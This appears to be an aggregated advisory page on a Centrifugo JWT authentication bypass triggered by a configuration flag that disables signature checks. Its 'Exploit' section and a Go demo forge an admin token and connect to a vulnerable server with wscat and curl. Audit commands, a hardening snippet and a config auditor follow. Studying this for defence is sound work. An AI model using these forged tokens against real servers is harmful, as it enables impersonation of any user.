The `insecure_skip_token_signature_verify` flag in Centrifugo, when set to true, disables JWT signature verification entirely. The flag is defined in `internal/configtypes/types.go` and passed directly to the token verification logic in `internal/client/handler.go`. In `token_verifier_jwt.go`, when `skipVerify` is true, the whole signature verification block is bypassed, so any JWT is accepted regardless of whether its signature is valid.

The flag can be enabled through several vectors: config files (including YAML and TOML formats) or the environment variable `CENTRIFUGO_INSECURE_SKIP_TOKEN_SIGNATURE_VERIFY=true`. Critically, no warning is logged at startup or at runtime while the flag is active, so the insecure state is invisible to operators. Even with a legitimate `hmac_secret_key` configured, the startup log still reports "enabled JWT verifiers", which falsely implies that verification is in force.

A proof of concept shows that with the flag enabled, a token signed with a completely wrong key is accepted in full, allowing an unauthenticated client to connect as any user ID it chooses. The issue affects every connection transport (WebSocket, HTTP streaming, SSE and gRPC) and is easy to trigger by accident through environment variable injection in containerized deployments.
Platform: Centrifugo
Version: < 6.7.0
Vulnerability: Authentication Bypass
Severity: Critical
Date: 2026-03-12
Prediction: Patch Q2 2026
What Undercode Say:
Analytics
The vulnerability stems from a dangerous configuration flag that disables JWT signature verification without any warning to operators. The code path skips signature validation whenever `insecure_skip_token_signature_verify=true`, producing a silent authentication bypass. The flag propagates from the config layer to the token verification calls directly and unconditionally, with no runtime indicator that the control is off. Because nothing is logged, an accidental production exposure cannot be detected through normal monitoring channels; only a configuration audit reveals it.
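The code path described above, reduced to a self-contained Go program. This is an added example written for this page, not Centrifugo's own code: the `Verifier`, `SkipVerify`, `NewVerifier` and `Claims` names are illustrative stand-ins for the `skipVerify` branch the analysis refers to. It forges an HS256 token under a key the server does not hold, shows that the vulnerable path accepts it for the `sub` of the attacker's choosing, and shows the hardened path (signature pinned to HS256, compared in constant time, plus a constructor that refuses to start with the flag set) rejecting it.

```go
package main

import (
	"crypto/hmac"
	"crypto/sha256"
	"encoding/base64"
	"encoding/json"
	"errors"
	"fmt"
	"strings"
)

// Claims is the subset of JWT payload fields used here (sub is the user ID).
type Claims struct {
	Sub string `json:"sub"`
	Exp int64  `json:"exp"`
}

// Verifier is an illustrative stand-in for the HMAC verifier the advisory
// describes: a secret plus a skipVerify switch. Not Centrifugo's own code.
type Verifier struct {
	HMACSecret []byte
	SkipVerify bool
}

// NewVerifier is the hardened constructor: it refuses to build a verifier with
// signature checking disabled instead of silently honouring the setting.
func NewVerifier(secret []byte, skipVerify bool) (*Verifier, error) {
	if skipVerify {
		return nil, errors.New("refusing to start: JWT signature verification is disabled")
	}
	if len(secret) == 0 {
		return nil, errors.New("hmac secret key is empty")
	}
	return &Verifier{HMACSecret: secret}, nil
}

func b64url(b []byte) string { return base64.RawURLEncoding.EncodeToString(b) }

// SignHS256 builds a compact HS256 JWT; used here to forge a token under a key
// the server does not know, as the advisory's PoC does.
func SignHS256(claims Claims, key []byte) (string, error) {
	payload, err := json.Marshal(claims)
	if err != nil {
		return "", err
	}
	signingInput := b64url([]byte(`{"alg":"HS256","typ":"JWT"}`)) + "." + b64url(payload)
	mac := hmac.New(sha256.New, key)
	mac.Write([]byte(signingInput))
	return signingInput + "." + b64url(mac.Sum(nil)), nil
}

// VerifyConnectToken mirrors the vulnerable code path: when SkipVerify is set the
// signature segment is never examined, so any well-formed token is accepted for
// any user ID. With SkipVerify false the header alg is pinned to HS256 and the
// HMAC is compared in constant time before the claims are trusted.
func (v *Verifier) VerifyConnectToken(token string, now int64) (Claims, error) {
	var c Claims
	parts := strings.Split(token, ".")
	if len(parts) != 3 {
		return c, errors.New("malformed token")
	}
	if !v.SkipVerify {
		hdrBytes, err := base64.RawURLEncoding.DecodeString(parts[0])
		if err != nil {
			return c, errors.New("bad header encoding")
		}
		var hdr struct {
			Alg string `json:"alg"`
		}
		if err := json.Unmarshal(hdrBytes, &hdr); err != nil || hdr.Alg != "HS256" {
			return c, fmt.Errorf("unsupported alg %q", hdr.Alg)
		}
		sig, err := base64.RawURLEncoding.DecodeString(parts[2])
		if err != nil {
			return c, errors.New("bad signature encoding")
		}
		mac := hmac.New(sha256.New, v.HMACSecret)
		mac.Write([]byte(parts[0] + "." + parts[1]))
		if !hmac.Equal(sig, mac.Sum(nil)) {
			return c, errors.New("invalid signature")
		}
	}
	payload, err := base64.RawURLEncoding.DecodeString(parts[1])
	if err != nil {
		return c, errors.New("bad payload encoding")
	}
	if err := json.Unmarshal(payload, &c); err != nil {
		return c, err
	}
	if c.Exp != 0 && c.Exp < now {
		return c, errors.New("token expired")
	}
	return c, nil
}

func main() {
	// Constructed input: a token signed with a key the server has never seen.
	forged, _ := SignHS256(Claims{Sub: "admin", Exp: 9999999999}, []byte("attacker-chosen-key"))
	vulnerable := &Verifier{HMACSecret: []byte("legitimate-secret"), SkipVerify: true}
	c, err := vulnerable.VerifyConnectToken(forged, 1700000000)
	fmt.Println("skipVerify=true :", c.Sub, err)
	hardened := &Verifier{HMACSecret: []byte("legitimate-secret")}
	_, err = hardened.VerifyConnectToken(forged, 1700000000)
	fmt.Println("skipVerify=false:", err)
}
```

The expiry check runs in both branches, which is why the forged token carries a far-future `exp`: once the signature is not verified, the attacker controls every claim, so expiration, audience and issuer checks constrain nothing.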
Exploit:
# Generate a JWT with an arbitrary signature (header: HS256; payload: {"sub":"admin","exp":9999999999})
cat > malicious_token.txt << 'EOF'
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhZG1pbiIsImV4cCI6OTk5OTk5OTk5OX0.invalid-signature-here
EOF

# Connect to the vulnerable Centrifugo server over WebSocket
wscat -c "ws://vulnerable-centrifugo:8000/connection/websocket?token=$(cat malicious_token.txt)"

# Or over HTTP streaming with curl
curl -X POST "http://vulnerable-centrifugo:8000/connection/http_stream" \
  -H "Authorization: Bearer $(cat malicious_token.txt)"

# Reproduce the misconfiguration by injecting the flag through the container environment
docker run -e CENTRIFUGO_INSECURE_SKIP_TOKEN_SIGNATURE_VERIFY=true \
  -e CENTRIFUGO_CLIENT_TOKEN_HMAC_SECRET_KEY=legitimate-secret \
  centrifugo/centrifugo:v6.5.0
Protection from this vulnerability
1. Immediate: set `insecure_skip_token_signature_verify: false` (or remove the key) in all configurations, and make sure no CENTRIFUGO_* environment variable re-enables it.
2. Verification: audit environment variables and config files for the insecure flag:
# Search the environment of running containers
docker ps | grep centrifugo | awk '{print $1}' | xargs -I {} docker inspect {} | grep -i insecure_skip

# Check the environment of running centrifugo processes (reading /proc/<pid>/environ needs root)
ps aux | grep centrifugo | grep -v grep | awk '{print $2}' | xargs -I {} cat /proc/{}/environ | tr '\0' '\n' | grep INSECURE_SKIP

# Audit config files; print the matching line so the value (true/false) is visible, not just the key
find /etc -path '*centrifugo*' -type f -exec grep -Hn "insecure_skip_token_signature_verify" {} \;
3. Code Review: Implement startup warnings
// Add this to your fork or request it upstream. `cfg.Client.InsecureSkipTokenSignatureVerify`
// is the illustrative config field path used on this page; `log` is a zerolog-style global logger.
// Fatal refuses to start with the flag set; use log.Warn() instead if you only want a visible warning.
if cfg.Client.InsecureSkipTokenSignatureVerify {
	log.Fatal().Msg("SECURITY ALERT: JWT signature verification DISABLED - this is UNSAFE for production")
}
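A repeatable form of the audit in step 2, as an added Go example (not Centrifugo's code): it takes a JSON config document and an environment list, reports every place the flag is set and what it evaluates to, and returns the effective value. Because the page does not say where in the config tree the key lives, the walker searches every nesting level; the assumption that an environment variable overrides the file (as viper-style loaders do) is labelled in the code and should be swapped if your deployment resolves config differently. The sample config and environment are constructed for the example.

```go
package main

import (
	"encoding/json"
	"fmt"
	"strconv"
	"strings"
)

// flagKey is the config key the advisory describes.
const flagKey = "insecure_skip_token_signature_verify"

// Finding records one place the flag is set and the boolean it evaluates to.
type Finding struct {
	Source string // "config:<dotted path>" or "env:<NAME>"
	Value  bool
}

// asBool accepts the spellings a config loader would: JSON booleans, numbers,
// and strings such as "true", "1", "t".
func asBool(v interface{}) bool {
	switch x := v.(type) {
	case bool:
		return x
	case string:
		b, err := strconv.ParseBool(strings.TrimSpace(x))
		return err == nil && b
	case float64:
		return x != 0
	}
	return false
}

// walkConfig visits every object in a decoded JSON config so the flag is found
// regardless of which section it was placed in.
func walkConfig(node interface{}, path string, out *[]Finding) {
	switch n := node.(type) {
	case map[string]interface{}:
		for k, v := range n {
			p := k
			if path != "" {
				p = path + "." + k
			}
			if k == flagKey {
				*out = append(*out, Finding{Source: "config:" + p, Value: asBool(v)})
				continue
			}
			walkConfig(v, p, out)
		}
	case []interface{}:
		for i, v := range n {
			walkConfig(v, fmt.Sprintf("%s[%d]", path, i), out)
		}
	}
}

// AuditSkipVerify reports every source that sets the flag and the effective
// value. Assumption: an environment variable overrides the config file, as in
// viper-style loaders; if your deployment differs, swap the order below.
func AuditSkipVerify(configJSON []byte, environ []string) ([]Finding, bool, error) {
	var findings []Finding
	effective := false
	if len(configJSON) > 0 {
		var doc interface{}
		if err := json.Unmarshal(configJSON, &doc); err != nil {
			return nil, false, fmt.Errorf("config parse: %w", err)
		}
		walkConfig(doc, "", &findings)
		for _, f := range findings {
			if f.Value {
				effective = true
			}
		}
	}
	envSuffix := strings.ToUpper(flagKey)
	for _, kv := range environ {
		name, val, ok := strings.Cut(kv, "=")
		if !ok || !strings.HasPrefix(name, "CENTRIFUGO_") || !strings.HasSuffix(name, envSuffix) {
			continue
		}
		f := Finding{Source: "env:" + name, Value: asBool(val)}
		findings = append(findings, f)
		effective = f.Value // env wins over file (assumed loader precedence)
	}
	return findings, effective, nil
}

func main() {
	// Constructed sample: the file says false, but an injected env var turns the flag on.
	config := []byte(`{"client": {"token": {"hmac_secret_key": "legitimate-secret"}, "insecure_skip_token_signature_verify": false}}`)
	env := []string{"PATH=/usr/bin", "CENTRIFUGO_INSECURE_SKIP_TOKEN_SIGNATURE_VERIFY=true"}
	findings, on, err := AuditSkipVerify(config, env)
	if err != nil {
		panic(err)
	}
	for _, f := range findings {
		fmt.Printf("%-60s -> %v\n", f.Source, f.Value)
	}
	fmt.Println("effective insecure_skip_token_signature_verify:", on)
}
```

Run it against the config file and the output of `docker inspect` or `/proc/<pid>/environ` (split on NUL) to get a single answer per deployment; the point of matching any `CENTRIFUGO_*` name ending in the upper-cased key is that the env var prefix differs between config sections, so a grep on the suffix catches all of them.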
Impact
- Complete authentication bypass allowing arbitrary user impersonation
- No audit trail or logs indicating the insecure state
- Silent failure mode makes detection impossible without manual config audit
- Affects all connection types and deployment scenarios
- Particularly dangerous in containerized environments where environment variables can be injected accidentally
- Undermines all JWT-based security controls: once the signature is not checked, an attacker sets every claim, so expiration, audience and issuer validation constrain nothing
Sources:
Reported By: github.com